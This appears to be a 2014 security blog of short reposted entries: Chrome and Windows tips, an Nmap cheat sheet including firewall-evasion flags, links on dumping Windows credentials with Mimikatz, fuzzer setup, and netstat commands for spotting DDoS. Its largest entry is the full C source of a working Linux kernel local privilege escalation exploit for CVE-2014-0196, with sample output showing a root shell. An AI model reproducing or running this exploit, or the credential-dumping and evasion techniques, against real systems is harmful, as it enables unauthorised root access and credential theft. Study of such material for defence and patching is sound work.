May 17, 2014

Howto: Make Chrome Browser in Android smoother and faster

By default, the app can only access up to 128MB of RAM and then things start to bog down. High-end and even mid-range Android phones now have plenty of RAM though, so if you’re a heavy Chrome user, there’s no reason your experience has to be so limited.

1. Go to Chrome

2. Type "chrome://flags/#max-tiles-for-interest-area" in URL

3. Change Value to 256 , 512 MB

4. Relaunch it again. 

Source: http://bgr.com/2014/05/16/android-tips-tricks-speed-up-chrome-tweak/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Replayproxy

Forensic tool to replay web-based attacks (and also general HTTP traffic) that were captured in a pcap file 
 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 16, 2014

Howto: Create hidden folder that actually is not hidden in Windows

1. Create folder

2.  Properties folder and change the icon to blank picture

3. Go to run -> Character Map

4. Find the blank character and copy it

5. Change the name of folder to our character

6. That's it. It was hide.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Series For Dumping Windows Credentials

Dumping Windows Credentials
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/

Dumping NTDS.dit Domain Hashes Using Samba 

http://www.room362.com/blog/2014/05/14/dumping-ntds-dot-dit-domain-hashes-using-samba/

Using Mimikatz to Dump Passwords!

http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: APK-Downloder

For who you want to download apk file from Google Play.

http://apps.evozi.com/apk-downloader/

 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 15, 2014

Howto: Using Nmap detect host down only

nmap -v -sn -oG - target_ip | grep Down
If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: Multi Cheat Sheet

This source is very awesome. It has many cheat sheep of programming language such as python, java,php, jquery, etc. Please check the source




Source: http://overapi.com/python/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Bradamsa - Burp Suite extension to generate Intruder payloads using Radamsa

How To Use It

  1. Install Radamsa from Hatlp GIT or the official Google project page
$ git clone http://haltp.org/git/radamsa.git
$ cd radamsa
$ make
$ sudo make install
$ curl https://ouspg.googlecode.com/files/radamsa-0.3.tar.gz | tar -zxvf - && cd radamsa-0.3 && make && sudo make install && man radamsa
  1. From the Extender tab in Burp Suite, add bradamsa.jar
  2. Open the Bradamsa tab and configure Radamsa. For more details, please refer to the official Radamsa page or type $ radamsa --help in your terminal
  3. Send a request to Burp Intruder
  4. In Payload --> Payload Sets --> Payload type, select "Extension-generated"
  5. In Payload --> Payload Options --> Select generator, choose "Bradamsa" from the drop down list
  6. Finish to configure Burp Intruder and start fuzzing
Souce: https://github.com/ikkisoft/bradamsa



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 14, 2014

CheatSheet: Nmap Cheat Sheet


Basic Scanning Techniques
Scan a single target —> nmap [target]
Scan multiple targets —> nmap [target1,target2,etc]
Scan a list of targets —-> nmap -iL [list.txt]
Scan a range of hosts —-> nmap [range of IP addresses]
Scan an entire subnet —-> nmap [IP address/cdir]
Scan random hosts —-> nmap -iR [number]
Excluding targets from a scan —> nmap [targets] –exclude [targets]
Excluding targets using a list —> nmap [targets] –excludefile [list.txt]
Perform an aggressive scan —> nmap -A [target]
Scan an IPv6 target —> nmap -6 [target]
Discovery Options
Perform a ping scan only —> nmap -sP [target]
Don’t ping —> nmap -PN [target]
TCP SYN Ping —> nmap -PS [target]
TCP ACK ping —-> nmap -PA [target]
UDP ping —-> nmap -PU [target]
SCTP Init Ping —> nmap -PY [target]
ICMP echo ping —-> nmap -PE [target]
ICMP Timestamp ping —> nmap -PP [target]
ICMP address mask ping —> nmap -PM [target]
IP protocol ping —-> nmap -PO [target]
ARP ping —> nmap -PR [target]
Traceroute —> nmap –traceroute [target]
Force reverse DNS resolution —> nmap -R [target]
Disable reverse DNS resolution —> nmap -n [target]
Alternative DNS lookup —> nmap –system-dns [target]
Manually specify DNS servers —> nmap –dns-servers [servers] [target]
Create a host list —-> nmap -sL [targets]
Advanced Scanning Options
TCP SYN Scan —> nmap -sS [target]
TCP connect scan —-> nmap -sT [target]
UDP scan —-> nmap -sU [target]
TCP Null scan —-> nmap -sN [target]
TCP Fin scan —> nmap -sF [target]
Xmas scan —-> nmap -sX [target]
TCP ACK scan —> nmap -sA [target]
Custom TCP scan —-> nmap –scanflags [flags] [target]
IP protocol scan —-> nmap -sO [target]
Send Raw Ethernet packets —-> nmap –send-eth [target]
Send IP packets —-> nmap –send-ip [target]
Port Scanning Options
Perform a fast scan —> nmap -F [target]
Scan specific ports —-> nmap -p [ports] [target]
Scan ports by name —-> nmap -p [port name] [target]
Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]
Scan all ports —-> nmap -p “*” [target]
Scan top ports —–> nmap –top-ports [number] [target]
Perform a sequential port scan —-> nmap -r [target]
Version Detection
Operating system detection —-> nmap -O [target]
Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/
Attempt to guess an unknown —-> nmap -O –osscan-guess [target]
Service version detection —-> nmap -sV [target]
Troubleshooting version scans —-> nmap -sV –version-trace [target]
Perform a RPC scan —-> nmap -sR [target]
Timing Options
Timing Templates —-> nmap -T [0-5] [target]
Set the packet TTL —-> nmap –ttl [time] [target]
Minimum of parallel connections —-> nmap –min-parallelism [number] [target]
Maximum of parallel connection —-> nmap –max-parallelism [number] [target]
Minimum host group size —–> nmap –min-hostgroup [number] [targets]
Maximum host group size —-> nmap –max-hostgroup [number] [targets]
Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]
Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]
Maximum retries —-> nmap –max-retries [number] [target]
Host timeout —-> nmap –host-timeout [time] [target]
Minimum Scan delay —-> nmap –scan-delay [time] [target]
Maximum scan delay —-> nmap –max-scan-delay [time] [target]
Minimum packet rate —-> nmap –min-rate [number] [target]
Maximum packet rate —-> nmap –max-rate [number] [target]
Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]
Firewall Evasion Techniques
Fragment packets —-> nmap -f [target]
Specify a specific MTU —-> nmap –mtu [MTU] [target]
Use a decoy —-> nmap -D RND: [number] [target]
Idle zombie scan —> nmap -sI [zombie] [target]
Manually specify a source port —-> nmap –source-port [port] [target]
Append random data —-> nmap –data-length [size] [target]
Randomize target scan order —-> nmap –randomize-hosts [target]
Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]
Send bad checksums —-> nmap –badsum [target]
Output Options
Save output to a text file —-> nmap -oN [scan.txt] [target]
Save output to a xml file —> nmap -oX [scan.xml] [target]
Grepable output —-> nmap -oG [scan.txt] [target]
Output all supported file types —-> nmap -oA [path/filename] [target]
Periodically display statistics —-> nmap –stats-every [time] [target]
133t output —-> nmap -oS [scan.txt] [target]
Troubleshooting and debugging
Help —> nmap -h
Display Nmap version —-> nmap -V
Verbose output —-> nmap -v [target]
Debugging —-> nmap -d [target]
Display port state reason —-> nmap –reason [target]
Only display open ports —-> nmap –open [target]
Trace packets —> nmap –packet-trace [target]
Display host networking —> nmap –iflist
Specify a network interface —> nmap -e [interface] [target]
Nmap Scripting Engine
Execute individual scripts —> nmap –script [script.nse] [target]
Execute multiple scripts —-> nmap –script [expression] [target]
Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln
Execute scripts by category —-> nmap –script [category] [target]
Execute multiple scripts categories —-> nmap –script [category1,category2, etc]
Troubleshoot scripts —-> nmap –script [script] –script-trace [target]
Update the script database —-> nmap –script-updatedb
Ndiff
Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]
XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]


Source: http://pentestlab.wordpress.com/2012/08/17/nmap-cheat-sheet/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Slide PowerUp - Automating Windows Privilege Escalation By @harmj0y






Source: http://www.slideshare.net/harmj0y/power-up-34515686#btnNext




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

[POC] CVE-2014-0196: Linux kernel pty layer race condition memory corruption (local root exploit)

/*
 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
 * condition
 *
 * Slightly-less-than-POC privilege escalation exploit
 * For kernels >= v3.14-rc1
 *
 * Matthew Daley <mattd@bugfuzz.com>
 *
 * Usage: 
 *   $ gcc cve-2014-0196-md.c -lutil -lpthread
 *   $ ./a.out
 *   [+] Resolving symbols
 *   [+] Resolved commit_creds: 0xffffffff81056694
 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
 *   [+] Doing once-off allocations
 *   [+] Attempting to overflow into a tty_struct...............
 *   [+] Got it :)
 *   # id
 *   uid=0(root) gid=0(root) groups=0(root)
 *
 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4
 * chance that the overflow will go off the end of a slab. This does not
 * necessarily lead to an immediate kernel crash, but you should be prepared
 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be
 * avoidable by reading /proc/slabinfo on systems where it is still available
 * to unprivileged users.
 *
 * Caveat: The vulnerability should be exploitable all the way from
 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this
 * exploit relies on.
 *
 * Thanks to Jon Oberheide for his help on exploitation technique.
 */

#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <pthread.h>
#include <pty.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200
#define RUN_ALLOCS    30

struct device;
struct tty_driver;
struct tty_operations;

typedef struct {
 int counter;
} atomic_t;

struct kref {
 atomic_t refcount;
};

struct tty_struct_header {
 int magic;
 struct kref kref;
 struct device *dev;
 struct tty_driver *driver;
 const struct tty_operations *ops;
} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;
char buf[1024] = {0};
commit_creds_fn commit_creds;
prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {
 commit_creds(prepare_kernel_cred(0));

 return 0;
}

unsigned long get_symbol(char *target_name) {
 FILE *f;
 unsigned long addr;
 char dummy;
 char name[256];
 int ret = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL)
  return 0;

 while (ret != EOF) {
  ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
  if (ret == 0) {
   fscanf(f, "%s\n", name);
   continue;
  }

  if (!strcmp(name, target_name)) {
   printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

   fclose(f);
   return addr;
  }
 }

 printf("[-] Couldn't resolve \"%s\"\n", name);

 fclose(f);
 return 0;
}

void *overwrite_thread_fn(void *p) {
 write(slave_fd, buf, 511);

 write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
 write(slave_fd, &overwrite, sizeof(overwrite));
}

int main() {
 char scratch[1024] = {0};
 void *tty_operations[64];
 int i, temp_fd_1, temp_fd_2;

 for (i = 0; i < 64; ++i)
  tty_operations[i] = payload;

 overwrite.magic                 = TTY_MAGIC;
 overwrite.kref.refcount.counter = 0x1337;
 overwrite.dev                   = (struct device *)scratch;
 overwrite.driver                = (struct tty_driver *)scratch;
 overwrite.ops                   = (struct tty_operations *)tty_operations;

 puts("[+] Resolving symbols");

 commit_creds = (commit_creds_fn)get_symbol("commit_creds");
 prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
 if (!commit_creds || !prepare_kernel_cred)
  return 1;

 puts("[+] Doing once-off allocations");

 for (i = 0; i < ONEOFF_ALLOCS; ++i)
  if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
   puts("[-] pty creation failed");
   return 1;
  }

 printf("[+] Attempting to overflow into a tty_struct...");
 fflush(stdout);

 for (i = 0; ; ++i) {
  struct termios t;
  int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
  pthread_t overwrite_thread;

  if (!(i & 0xfff)) {
   putchar('.');
   fflush(stdout);
  }

  if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
   puts("\n[-] pty creation failed");
   return 1;
  }

  for (j = 0; j < RUN_ALLOCS; ++j)
   if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
    puts("\n[-] pty creation failed");
    return 1;
   }

  close(fds[RUN_ALLOCS / 2]);
  close(fds2[RUN_ALLOCS / 2]);

  write(slave_fd, buf, 1);

  tcgetattr(master_fd, &t);
  t.c_oflag &= ~OPOST;
  t.c_lflag |= ECHO;
  tcsetattr(master_fd, TCSANOW, &t);

  if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
   puts("\n[-] Overwrite thread creation failed");
   return 1;
  }
  write(master_fd, "A", 1);
  pthread_join(overwrite_thread, NULL);

  for (j = 0; j < RUN_ALLOCS; ++j) {
   if (j == RUN_ALLOCS / 2)
    continue;

   ioctl(fds[j], 0xdeadbeef);
   ioctl(fds2[j], 0xdeadbeef);

   close(fds[j]);
   close(fds2[j]);
  }

  ioctl(master_fd, 0xdeadbeef);
  ioctl(slave_fd, 0xdeadbeef);

  close(master_fd);
  close(slave_fd);

  if (!setresuid(0, 0, 0)) {
   setresgid(0, 0, 0);

   puts("\n[+] Got it :)");
   execl("/bin/bash", "/bin/bash", NULL);
  }
 }
}




 Source: http://www.reddit.com/r/netsec/comments/25cskj/poc_cve20140196_linux_kernel_pty_layer_race/
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: iOS Reverse Engineering Toolkit(IRET)

It should be the goal of every worker to expend less time and energy to achieve a task, while still maintaining, or even increasing, productivity. As an iOS penetration tester, I find myself repeating the same manual tasks for each test. Typing out the same commands to run various tools that are required to help me do my job. And to be honest, it’s completely monotonous. Every time I fat-finger a key, I lose productivity, forcing me to expend more time and energy to achieve the task. I’m a fan of automation. I’m a fan of streamlined innovation that saves me time and still accomplishes, for the most part, the same results. It was this desire to save time, and reduce my likelihood of suffering from carpal tunnel, that I created the iOS Reverse Engineering Toolkit.

What is iRET?

So what is iRET? Well, for lack of a better, more eloquent definition, it’s a toolkit that allows you to automate many of the manual tasks an iOS penetration tester would need to perform in order to analyze and reverse engineering iOS applications. And the bonus is…this can all be performed right on the device. Still sound like an interesting toolkit? Great, read on.



Source: http://blog.veracode.com/2014/03/introducing-the-ios-reverse-engineering-toolkit/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: Archlinux


Source: http://elzoona.com.ar/archcheatsheet/archcheatsheet.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: SQLMap

Download Link: https://github.com/aramosf/sqlmap-cheatsheet/raw/master/sqlmap%20cheatsheet%20v1.0-SBD.pdf

Source: http://www.reddit.com/r/netsec/comments/25grqk/sqlmap_cheatsheet/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 12, 2014

Howto: Debug OWASP-ZAP Proxy in Kali

1. Go to /usr/share/zaproxy/xml

2. Open file log4j.properties

3. Change from
log4j.logger.org.parosproxy.paros=INFO
log4j.logger.org.zaproxy.zap=INFO
to
log4j.logger.org.parosproxy.paros=DEBUG
log4j.logger.org.zaproxy.zap=DEBUG



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Verify DDoS attack with netstat

Some examples with explanation

netstat -na
This display all active Internet connections to the server and only established connections are included.
netstat -an | grep :80 | sort
Show only active Internet connections to the server on port 80, this is the http port and so it’s useful if you have a web server, and sort the results. Useful in detecting a single flood by allowing you to recognize many connections coming from one IP.
netstat -n -p|grep SYN_REC | wc -l
This command is useful to find out how many active SYNC_REC are occurring on the server. The number should be pretty low, preferably less than 5. On DoS attack incidents or mail bombs, the number can jump to pretty high. However, the value always depends on system, so a high value may be average on another server.
netstat -n -p | grep SYN_REC | sort -u
List out the all IP addresses involved instead of just count.
netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'
List all the unique IP addresses of the node that are sending SYN_REC connection status.
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
Use netstat command to calculate and count the number of connections each IP address makes to the server.
netstat -anp |grep 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
List count of number of connections the IPs are connected to the server using TCP or UDP protocol.
netstat -ntu | grep ESTAB | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr
Check on ESTABLISHED connections instead of all connections, and displays the connections count for each IP.
netstat -plan|grep :80|awk {'print $5'}|cut -d: -f 1|sort|uniq -c|sort -nk 1
Show and list IP address and its connection count that connect to port 80 on the server. Port 80 is used mainly by HTTP web page request.

How to mitigate a DOS attack

Once that you have found the IP that are attacking your server you can use the following commands to block their connection to your server:
iptables -A INPUT 1 -s $IPADRESS -j DROP/REJECT
Please note that you have to replace $IPADRESS with the IP numbers that you have found with netstat.
After firing the above command, KILL all httpd connections to clean your system and than restart httpd service by
using the following commands:
killall -KILL httpd
 
service httpd start           #For Red Hat systems 
/etc/init/d/apache2 restart   #For Debian systems


Source: http://linuxaria.com/howto/how-to-verify-ddos-attack-with-netstat-command-on-linux-terminal



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 11, 2014

Ebook: Reverse Engineering for Beginners Book.

Reverse Engineering for Beginners Book.
Topics discussed: x86, ARM.
Topics touched: Oracle RDBMS, Itanium, copy-protection dongles, LD_PRELOAD,
stack overflow, ELF, win32 PE file format, x86-64, critical sections, syscalls,
TLS, position-independent code (PIC), profile-guided optimization, C++ STL, OpenMP, win32 SEH.
Compiled versions are:
(English) http://yurichev.com/writings/RE_for_beginners-en.pdf
          http://yurichev.com/writings/RE_for_beginners-en-A5.pdf (for e-book readers)
(Russian) http://yurichev.com/writings/RE_for_beginners-ru.pdf
          http://yurichev.com/writings/RE_for_beginners-ru-A5.pdf (for e-book readers)
See also ChangeLog file for latest changes!


Source: http://yurichev.com/RE-book.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.